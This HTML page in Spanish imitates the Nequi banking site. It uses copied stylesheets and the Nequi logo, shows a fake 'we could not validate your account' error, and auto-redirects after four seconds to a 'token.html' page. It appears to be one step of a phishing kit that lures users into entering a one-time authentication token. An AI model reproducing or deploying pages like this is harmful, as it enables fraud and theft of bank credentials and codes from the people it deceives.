<html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="refresh" content="4; URL='token.html'">
    <title>Cargando...</title>
    <link rel="stylesheet" href="css/main.css">
    <link rel="stylesheet" href="css/nequi_one.webflow.css">
    <link rel="stylesheet" href="css/nequi_two.webflow.css">
    <link rel="stylesheet" href="css/normalize.css">
    <style>
        
        /* Estilos generales */
        body {
            margin: 0;
            font-family: Arial, sans-serif;
            background-color: #f1bfda;
        }

        .loading-container {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
        }

        .loading {
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            text-align: center;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.2);
        }

        .loading-image {
            max-width: 100%;
            height: auto;
            margin-bottom: 20px;
        }

        .loading-text {
            font-size: 14px;
            color: black;
            margin-bottom: 10px;
            line-height: 1.4;
        }

        .error-image {
            max-width: 100px;
            height: auto;
        }
    </style>
<script type="text/javascript">
    window.hasMobileFirstExtension = true;</script></head>
<body>

<header>
    <div class="wrap-header">
        <div class="row">
            <div class="col-xs-12 col-md-2">
                <div class="logo">
                    <a href="https://www.nequi.com.co">
                        <img alt="nequi" src="https://uploads-ssl.webflow.com/6317a229ebf7723658463b4b/64dfef05bc6705edb9447499_nequi.svg">
                    </a>
                </div>
                <div class="btn-menu-hamburguer" ng-click="openMenu();">
                    <a>
                        <span></span>
                    </a>
                </div>
            </div>
            <div class="col-xs-12 col-md-10 container-buttons">
                <div class="wrap-main-menu">
                    <!-- Aquí va el contenido del menú si lo hay -->
                </div>
            </div>
        </div>
    </div>
</header>
    
<div class="loading-container">
    <div class="loading">
        <div class="loading-image-container">
            <img src="images/neq.png" alt="Imagen de carga" class="loading-image" style="
    width: 200px;
">
        </div>
        <div class="loading-text"><strong>No pudimos validar tu cuenta</strong> Hubo un error procesando tu información por favor, vuelve a intentarlo.</div>
        <div class="error-image-container">
            <img src="images/error.gif" alt="Error" class="error-image">
        </div>
    </div>
</div>



</body></html>